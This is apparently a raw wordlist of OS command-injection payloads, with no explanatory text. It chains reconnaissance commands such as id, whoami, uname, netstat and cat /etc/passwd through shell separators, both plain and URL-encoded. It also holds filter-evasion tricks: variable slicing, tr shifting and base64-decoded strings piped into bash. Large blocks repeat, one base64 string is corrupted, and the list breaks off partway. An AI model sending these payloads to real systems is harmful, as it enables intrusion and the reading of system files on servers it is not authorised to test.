id\nls
id%0als
id&ls
id%26ls
id|ls
id%7cls
id&&ls
id%26%26ls
id||ls
id%7c%7cls
id`ls`
id%60%60ls
id$()ls
id%24%28%29ls
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
ls;whoami
ls%3bwhoami
ls\nwhoami
ls%0awhoami
ls&whoami
ls%26whoami
ls|whoami
ls%7cwhoami
ls&&whoami
ls%26%26whoami
ls||whoami
ls%7c%7cwhoami
ls`whoami`
ls%60%60whoami
ls$()whoami
ls%24%28%29whoami
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
cat /etc/passwd;ls
cat /etc/passwd%3bls
cat /etc/passwd\nls
cat /etc/passwd%0als
cat /etc/passwd&ls
cat /etc/passwd%26ls
cat /etc/passwd|ls
cat /etc/passwd%7cls
cat /etc/passwd&&ls
cat /etc/passwd%26%26ls
cat /etc/passwd||ls
cat /etc/passwd%7c%7cls
cat /etc/passwd`ls`
cat /etc/passwd%60%60ls
cat /etc/passwd$()ls
cat /etc/passwd%24%28%29ls
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
id;cat /etc/passwd
id%3bcat /etc/passwd
id\ncat /etc/passwd
id%0acat /etc/passwd
id&cat /etc/passwd
id%26cat /etc/passwd
id|cat /etc/passwd
id%7ccat /etc/passwd
id&&cat /etc/passwd
id%26%26cat /etc/passwd
id||cat /etc/passwd
id%7c%7ccat /etc/passwd
id`cat /etc/passwd`
id%60%60cat /etc/passwd
id$()cat /etc/passwd
id%24%28%29cat /etc/passwd
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
ls;echo 'Fr4nzisko payload hacked!'
ls%3becho 'Fr4nzisko payload hacked!'
ls\necho 'Fr4nzisko payload hacked!'
ls%0aecho 'Fr4nzisko payload hacked!'
ls&echo 'Fr4nzisko payload hacked!'
ls%26echo 'Fr4nzisko payload hacked!'
ls|echo 'Fr4nzisko payload hacked!'
ls%7cecho 'Fr4nzisko payload hacked!'
ls&&echo 'Fr4nzisko payload hacked!'
ls%26%26echo 'Fr4nzisko payload hacked!'
ls||echo 'Fr4nzisko payload hacked!'
ls%7c%7cecho 'Fr4nzisko payload hacked!'
ls`echo 'Fr4nzisko payload hacked!'`
ls%60%60echo 'Fr4nzisko payload hacked!'
ls$()echo 'Fr4nzisko payload hacked!'
ls%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;echo 'Fr4nzisko payload hacked!'
echo${LS_COLORS:10:1}passwd;echo 'Fr4nzisko payload hacked!'
$(tr '!-}' '"-~'<<<[);echo 'Fr4nzisko payload hacked!'
echo -n 'cat /etc/passwd' | base64;echo 'Fr4nzisko payload hacked!'
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);echo 'Fr4nzisko payload hacked!'
whoami;echo 'Fr4nzisko payload hacked!'
whoami%3becho 'Fr4nzisko payload hacked!'
whoami\necho 'Fr4nzisko payload hacked!'
whoami%0aecho 'Fr4nzisko payload hacked!'
whoami&echo 'Fr4nzisko payload hacked!'
whoami%26echo 'Fr4nzisko payload hacked!'
whoami|echo 'Fr4nzisko payload hacked!'
whoami%7cecho 'Fr4nzisko payload hacked!'
whoami&&echo 'Fr4nzisko payload hacked!'
whoami%26%26echo 'Fr4nzisko payload hacked!'
whoami||echo 'Fr4nzisko payload hacked!'
whoami%7c%7cecho 'Fr4nzisko payload hacked!'
whoami`echo 'Fr4nzisko payload hacked!'`
whoami%60%60echo 'Fr4nzisko payload hacked!'
whoami$()echo 'Fr4nzisko payload hacked!'
whoami%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;echo 'Fr4nzisko payload hacked!'
id%3becho 'Fr4nzisko payload hacked!'
id\necho 'Fr4nzisko payload hacked!'
id%0aecho 'Fr4nzisko payload hacked!'
id&echo 'Fr4nzisko payload hacked!'
id%26echo 'Fr4nzisko payload hacked!'
id|echo 'Fr4nzisko payload hacked!'
id%7cecho 'Fr4nzisko payload hacked!'
id&&echo 'Fr4nzisko payload hacked!'
id%26%26echo 'Fr4nzisko payload hacked!'
id||echo 'Fr4nzisko payload hacked!'
id%7c%7cecho 'Fr4nzisko payload hacked!'
id`echo 'Fr4nzisko payload hacked!'`
id%60%60echo 'Fr4nzisko payload hacked!'
id$()echo 'Fr4nzisko payload hacked!'
id%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%3becho 'Fr4nzisko payload hacked!'
cat /etc/passwd\necho 'Fr4nzisko payload hacked!'
cat /etc/passwd%0aecho 'Fr4nzisko payload hacked!'
cat /etc/passwd&echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%26echo 'Fr4nzisko payload hacked!'
cat /etc/passwd|echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%7cecho 'Fr4nzisko payload hacked!'
cat /etc/passwd&&echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%26%26echo 'Fr4nzisko payload hacked!'
cat /etc/passwd||echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%7c%7cecho 'Fr4nzisko payload hacked!'
cat /etc/passwd`echo 'Fr4nzisko payload hacked!'`
cat /etc/passwd%60%60echo 'Fr4nzisko payload hacked!'
cat /etc/passwd$()echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3/2F9zZw==);cat /etc/passwd
ls;whoami
ls%3bwhoami
ls\nwhoami
ls%0awhoami
ls&whoami
ls%26whoami
ls|whoami
ls%7cwhoami
ls&&whoami
ls%26%26whoami
ls||whoami
ls%7c%7cwhoami
ls`whoami`
ls%60%60whoami
ls$()whoami
ls%24%28%29whoami
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
cat /etc/passwd;ls
cat /etc/passwd%3bls
cat /etc/passwd\nls
cat /etc/passwd%0als
cat /etc/passwd&ls
cat /etc/passwd%26ls
cat /etc/passwd|ls
cat /etc/passwd%7cls
cat /etc/passwd&&ls
cat /etc/passwd%26%26ls
cat /etc/passwd||ls
cat /etc/passwd%7c%7cls
cat /etc/passwd`ls`
cat /etc/passwd%60%60ls
cat /etc/passwd$()ls
cat /etc/passwd%24%28%29ls
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
id;cat /etc/passwd
id%3bcat /etc/passwd
id\ncat /etc/passwd
id%0acat /etc/passwd
id&cat /etc/passwd
id%26cat /etc/passwd
id|cat /etc/passwd
id%7ccat /etc/passwd
id&&cat /etc/passwd
id%26%26cat /etc/passwd
id||cat /etc/passwd
id%7c%7ccat /etc/passwd
id`cat /etc/passwd`
id%60%60cat /etc/passwd
id$()cat /etc/passwd
id%24%28%29cat /etc/passwd
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
ls;echo 'Fr4nzisko payload hacked!'
ls%3becho 'Fr4nzisko payload hacked!'
ls\necho 'Fr4nzisko payload hacked!'
ls%0aecho 'Fr4nzisko payload hacked!'
ls&echo 'Fr4nzisko payload hacked!'
ls%26echo 'Fr4nzisko payload hacked!'
ls|echo 'Fr4nzisko payload hacked!'
ls%7cecho 'Fr4nzisko payload hacked!'
ls&&echo 'Fr4nzisko payload hacked!'
ls%26%26echo 'Fr4nzisko payload hacked!'
ls||echo 'Fr4nzisko payload hacked!'
ls%7c%7cecho 'Fr4nzisko payload hacked!'
ls`echo 'Fr4nzisko payload hacked!'`
ls%60%60echo 'Fr4nzisko payload hacked!'
ls$()echo 'Fr4nzisko payload hacked!'
ls%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;echo 'Fr4nzisko payload hacked!'
echo${LS_COLORS:10:1}passwd;echo 'Fr4nzisko payload hacked!'
$(tr '!-}' '"-~'<<<[);echo 'Fr4nzisko payload hacked!'
echo -n 'cat /etc/passwd' | base64;echo 'Fr4nzisko payload hacked!'
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);echo 'Fr4nzisko payload hacked!'
whoami;echo 'Fr4nzisko payload hacked!'
whoami%3becho 'Fr4nzisko payload hacked!'
whoami\necho 'Fr4nzisko payload hacked!'
whoami%0aecho 'Fr4nzisko payload hacked!'
whoami&echo 'Fr4nzisko payload hacked!'
whoami%26echo 'Fr4nzisko payload hacked!'
whoami|echo 'Fr4nzisko payload hacked!'
whoami%7cecho 'Fr4nzisko payload hacked!'
whoami&&echo 'Fr4nzisko payload hacked!'
whoami%26%26echo 'Fr4nzisko payload hacked!'
whoami||echo 'Fr4nzisko payload hacked!'
whoami%7c%7cecho 'Fr4nzisko payload hacked!'
whoami`echo 'Fr4nzisko payload hacked!'`
whoami%60%60echo 'Fr4nzisko payload hacked!'
whoami$()echo 'Fr4nzisko payload hacked!'
whoami%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;echo 'Fr4nzisko payload hacked!'
id%3becho 'Fr4nzisko payload hacked!'
id\necho 'Fr4nzisko payload hacked!'
id%0aecho 'Fr4nzisko payload hacked!'
id&echo 'Fr4nzisko payload hacked!'
id%26echo 'Fr4nzisko payload hacked!'
id|echo 'Fr4nzisko payload hacked!'
id%7cecho 'Fr4nzisko payload hacked!'
id&&echo 'Fr4nzisko payload hacked!'
id%26%26echo 'Fr4nzisko payload hacked!'
id||echo 'Fr4nzisko payload hacked!'
id%7c%7cecho 'Fr4nzisko payload hacked!'
id`echo 'Fr4nzisko payload hacked!'`
id%60%60echo 'Fr4nzisko payload hacked!'
id$()echo 'Fr4nzisko payload hacked!'
id%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%3becho 'Fr4nzisko payload hacked!'
cat /etc/passwd\necho 'Fr4nzisko payload hacked!'
cat /etc/passwd%0aecho 'Fr4nzisko payload hacked!'
cat /etc/passwd&echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%26echo 'Fr4nzisko payload hacked!'
cat /etc/passwd|echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%7cecho 'Fr4nzisko payload hacked!'
cat /etc/passwd&&echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%26%26echo 'Fr4nzisko payload hacked!'
cat /etc/passwd||echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%7c%7cecho 'Fr4nzisko payload hacked!'
cat /etc/passwd`echo 'Fr4nzisko payload hacked!'`
cat /etc/passwd%60%60echo 'Fr4nzisko payload hacked!'
cat /etc/passwd$()echo 'Fr4nzisko payload hacked!'
cat /etc/passwd%24%28%29echo 'Fr4nzisko payload hacked!'
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
id;whoami
id%3bwhoami
id\nwhoami
id%0awhoami
id&whoami
id%26whoami
id|whoami
id%7cwhoami
id&&whoami
id%26%26whoami
id||whoami
id%7c%7cwhoami
id`whoami`
id%60%60whoami
id$()whoami
id%24%28%29whoami
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
id;whoami
id%3bwhoami
id\nwhoami
id%0awhoami
id&whoami
id%26whoami
id|whoami
id%7cwhoami
id&&whoami
id%26%26whoami
id||whoami
id%7c%7cwhoami
id`whoami`
id%60%60whoami
id$()whoami
id%24%28%29whoami
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
ls;uname -a
ls%3buname -a
ls\nuname -a
ls%0auname -a
ls&uname -a
ls%26uname -a
ls|uname -a
ls%7cuname -a
ls&&uname -a
ls%26%26uname -a
ls||uname -a
ls%7c%7cuname -a
ls`uname -a`
ls%60%60uname -a
ls$()uname -a
ls%24%28%29uname -a
echo${PATH:0:1}etc${PATH:0:1}passwd;uname -a
echo${LS_COLORS:10:1}passwd;uname -a
$(tr '!-}' '"-~'<<<[);uname -a
echo -n 'cat /etc/passwd' | base64;uname -a
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);uname -a
cat /etc/passwd;uname -a
cat /etc/passwd%3buname -a
cat /etc/passwd\nuname -a
cat /etc/passwd%0auname -a
cat /etc/passwd&uname -a
cat /etc/passwd%26uname -a
cat /etc/passwd|uname -a
cat /etc/passwd%7cuname -a
cat /etc/passwd&&uname -a
cat /etc/passwd%26%26uname -a
cat /etc/passwd||uname -a
cat /etc/passwd%7c%7cuname -a
cat /etc/passwd`uname -a`
cat /etc/passwd%60%60uname -a
cat /etc/passwd$()uname -a
cat /etc/passwd%24%28%29uname -a
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
whoami;uname -a
whoami%3buname -a
whoami\nuname -a
whoami%0auname -a
whoami&uname -a
whoami%26uname -a
whoami|uname -a
whoami%7cuname -a
whoami&&uname -a
whoami%26%26uname -a
whoami||uname -a
whoami%7c%7cuname -a
whoami`uname -a`
whoami%60%60uname -a
whoami$()uname -a
whoami%24%28%29uname -a
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;uname -a
id%3buname -a
id\nuname -a
id%0auname -a
id&uname -a
id%26uname -a
id|uname -a
id%7cuname -a
id&&uname - a
id%26%26uname -a
id||uname -a
id%7c%7cuname -a
id`uname -a`
id%60%60uname -a
id$()uname -a
id%24%28%29uname -a
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;uname -a
cat /etc/passwd%3buname -a
cat /etc/passwd\nuname -a
cat /etc/passwd%0auname -a
cat /etc/passwd&uname -a
cat /etc/passwd%26uname -a
cat /etc/passwd|uname -a
cat /etc/passwd%7cuname -a
cat /etc/passwd&&uname -a
cat /etc/passwd%26%26uname -a
cat /etc/passwd||uname -a
cat /etc/passwd%7c%7cuname -a
cat /etc/passwd`uname -a`
cat /etc/passwd%60%60uname -a
cat /etc/passwd$()uname -a
cat /etc/passwd%24%28%29uname -a
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;hostname
ls%3bhostname
ls\nhostname
ls%0ahostname
ls&hostname
ls%26hostname
ls|hostname
ls%7chostname
ls&&hostname
ls%26%26hostname
ls||hostname
ls%7c%7chostname
ls`hostname`
ls%60%60hostname
ls$()hostname
ls%24%28%29hostname
echo${PATH:0:1}etc${PATH:0:1}passwd;hostname
echo${LS_COLORS:10:1}passwd;hostname
$(tr '!-}' '"-~'<<<[);hostname
echo -n 'cat /etc/passwd' | base64;hostname
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);hostname
whoami;hostname
whoami%3bhostname
whoami\nhostname
whoami%0ahostname
whoami&hostname
whoami%26hostname
whoami|hostname
whoami%7chostname
whoami&&hostname
whoami%26%26hostname
whoami||hostname
whoami%7c%7chostname
whoami`hostname`
whoami%60%60hostname
whoami$()hostname
whoami%24%28%29hostname
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;hostname
id%3bhostname
id\nhostname
id%0ahostname
id&hostname
id%26hostname
id|hostname
id%7chostname
id&&hostname
id%26%26hostname
id||hostname
id%7c%7chostname
id`hostname`
id%60%60hostname
id$()hostname
id%24%28%29hostname
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;hostname
cat /etc/passwd%3bhostname
cat /etc/passwd\nhostname
cat /etc/passwd%0ahostname
cat /etc/passwd&hostname
cat /etc/passwd%26hostname
cat /etc/passwd|hostname
cat /etc/passwd%7chostname
cat /etc/passwd&&hostname
cat /etc/passwd%26%26hostname
cat /etc/passwd||hostname
cat /etc/passwd%7c%7chostname
cat /etc/passwd`hostname`
cat /etc/passwd%60%60hostname
cat /etc/passwd$()hostname
cat /etc/passwd%24%28%29hostname
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;netstat -an
ls%3bnetstat -an
ls\nnetstat -an
ls%0anetstat -an
ls&netstat -an
ls%26netstat -an
ls|netstat -an
ls%7cnetstat -an
ls&&netstat -an
ls%26%26netstat -an
ls||netstat -an
ls%7c%7cnetstat -an
ls`netstat -an`
ls%60%60netstat -an
ls$()netstat -an
ls%24%28%29netstat -an
echo${PATH:0:1}etc${PATH:0:1}passwd;netstat -an
echo${LS_COLORS:10:1}passwd;netstat -an
$(tr '!-}' '"-~'<<<[);netstat -an
echo -n 'cat /etc/passwd' | base64;netstat -an
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);netstat -an
whoami;netstat -an
whoami%3bnetstat -an
whoami\nnetstat -an
whoami%0anetstat -an
whoami&netstat -an
whoami%26netstat -an
whoami|netstat -an
whoami%7cnetstat -an
whoami&&netstat -an
whoami%26%26netstat -an
whoami||netstat -an
whoami%7c%7cnetstat -an
whoami`netstat -an`
whoami%60%60netstat -an
whoami$()netstat -an
whoami%24%28%29netstat -an
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;netstat -an
id%3bnetstat -an
id\nnetstat -an
id%0anetstat -an
id&netstat -an
id%26netstat -an
id|netstat -an
id%7cnetstat -an
id&&netstat -an
id%26%26netstat -an
id||netstat -an
id%7c%7cnetstat -an
id`netstat -an`
id%60%60netstat -an
id$()netstat -an
id%24%28%29netstat -an
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;netstat -an
cat /etc/passwd%3bnetstat -an
cat /etc/passwd\nnetstat -an
cat /etc/passwd%0anetstat -an
cat /etc/passwd&netstat -an
cat /etc/passwd%26netstat -an
cat /etc/passwd|netstat -an
cat /etc/passwd%7cnetstat -an
cat /etc/passwd&&netstat -an
cat /etc/passwd%26%26netstat -an
cat /etc/passwd||netstat -an
cat /etc/passwd%7c%7cnetstat -an
cat /etc/passwd`netstat -an`
cat /etc/passwd%60%60netstat -an
cat /etc/passwd$()netstat -an
cat /etc/passwd%24%28%29netstat -an
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;ifconfig
ls%3bifconfig
ls\nifconfig
ls%0aifconfig
ls&ifconfig
ls%26ifconfig
ls|ifconfig
ls%7cifconfig
ls&&ifconfig
ls%26%26ifconfig
ls||ifconfig
ls%7c%7cifconfig
ls`ifconfig`
ls%60%60ifconfig
ls$()ifconfig
ls%24%28%29ifconfig
echo${PATH:0:1}etc${PATH:0:1}passwd;ifconfig
echo${LS_COLORS:10:1}passwd;ifconfig
$(tr '!-}' '"-~'<<<[);ifconfig
echo -n 'cat /etc/passwd' | base64;ifconfig
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);ifconfig
whoami;ifconfig
whoami%3bifconfig
whoami\nifconfig
whoami%0aifconfig
whoami&ifconfig
whoami%26ifconfig
whoami|ifconfig
whoami%7cifconfig
whoami&&ifconfig
whoami%26%26ifconfig
whoami||ifconfig
whoami%7c%7cifconfig
whoami`ifconfig`
whoami%60%60ifconfig
whoami$()ifconfig
whoami%24%28%29ifconfig
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;ifconfig
id%3bifconfig
id\nifconfig
id%0aifconfig
id&ifconfig
id%26ifconfig
id|ifconfig
id%7cifconfig
id&&ifconfig
id%26%26ifconfig
id||ifconfig
id%7c%7cifconfig
id`ifconfig`
id%60%60ifconfig
id$()ifconfig
id%24%28%29ifconfig
echo${PATH:0:1}etc${PATH:0:1}passwd;id
echo${LS_COLORS:10:1}passwd;id
$(tr '!-}' '"-~'<<<[);id
echo -n 'cat /etc/passwd' | base64;id
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);id
cat /etc/passwd;ifconfig
cat /etc/passwd%3bifconfig
cat /etc/passwd\nifconfig
cat /etc/passwd%0aifconfig
cat /etc/passwd&ifconfig
cat /etc/passwd%26ifconfig
cat /etc/passwd|ifconfig
cat /etc/passwd%7cifconfig
cat /etc/passwd&&ifconfig
cat /etc/passwd%26%26ifconfig
cat /etc/passwd||ifconfig
cat /etc/passwd%7c%7cifconfig
cat /etc/passwd`ifconfig`
cat /etc/passwd%60%60ifconfig
cat /etc/passwd$()ifconfig
cat /etc/passwd%24%28%29ifconfig
echo${PATH:0:1}etc${PATH:0:1}passwd;cat /etc/passwd
echo${LS_COLORS:10:1}passwd;cat /etc/passwd
$(tr '!-}' '"-~'<<<[);cat /etc/passwd
echo -n 'cat /etc/passwd' | base64;cat /etc/passwd
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);cat /etc/passwd
ls;ping -c 4 127.0.0.1
ls%3bping -c 4 127.0.0.1
ls\nping -c 4 127.0.0.1
ls%0aping -c 4 127.0.0.1
ls&ping -c 4 127.0.0.1
ls%26ping -c 4 127.0.0.1
ls|ping -c 4 127.0.0.1
ls%7cping -c 4 127.0.0.1
ls&&ping -c 4 127.0.0.1
ls%26%26ping -c 4 127.0.0.1
ls||ping -c 4 127.0.0.1
ls%7c%7cping -c 4 127.0.0.1
ls`ping -c 4 127.0.0.1`
ls%60%60ping -c 4 127.0.0.1
ls$()ping -c 4 127.0.0.1
ls%24%28%29ping -c 4 127.0.0.1
echo${PATH:0:1}etc${PATH:0:1}passwd;ping -c 4 127.0.0.1
echo${LS_COLORS:10:1}passwd;ping -c 4 127.0.0.1
$(tr '!-}' '"-~'<<<[);ping -c 4 127.0.0.1
echo -n 'cat /etc/passwd' | base64;ping -c 4 127.0.0.1
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);ping -c 4 127.0.0.1
whoami;ping -c 4 127.0.0.1
whoami%3bping -c 4 127.0.0.1
whoami\nping -c 4 127.0.0.1
whoami%0aping -c 4 127.0.0.1
whoami&ping -c 4 127.0.0.1
whoami%26ping -c 4 127.0.0.1
whoami|ping -c 4 127.0.0.1
whoami%7cping -c 4 127.0.0.1
whoami&&ping -c 4 127.0.0.1
whoami%26%26ping -c 4 127.0.0.1
whoami||ping -c 4 127.0.0.1
whoami%7c%7cping -c 4 127.0.0.1
whoami`ping -c 4 127.0.0.1`
whoami%60%60ping -c 4 127.0.0.1
whoami$()ping -c 4 127.0.0.1
whoami%24%28%29ping -c 4 127.0.0.1
echo${PATH:0:1}etc${PATH:0:1}passwd;whoami
echo${LS_COLORS:10:1}passwd;whoami
$(tr '!-}' '"-~'<<<[);whoami
echo -n 'cat /etc/passwd' | base64;whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==);whoami
id;ping -c 4 127.0.0.1
id%3bping -c 4 127.0.0.1
id\nping -c 4 127.0.0.1
id%0aping -c 4 127.0.0.1
id&ping -c 4 127.0.0.1
id%26ping -c 4 127.0.0.1
id|ping -c 4 127.0.0.1
id%7cping -c 4 127.0.0.1
id&&ping -c 4 127.0.0.1
id%26%26ping -c 4 127.0.0.1
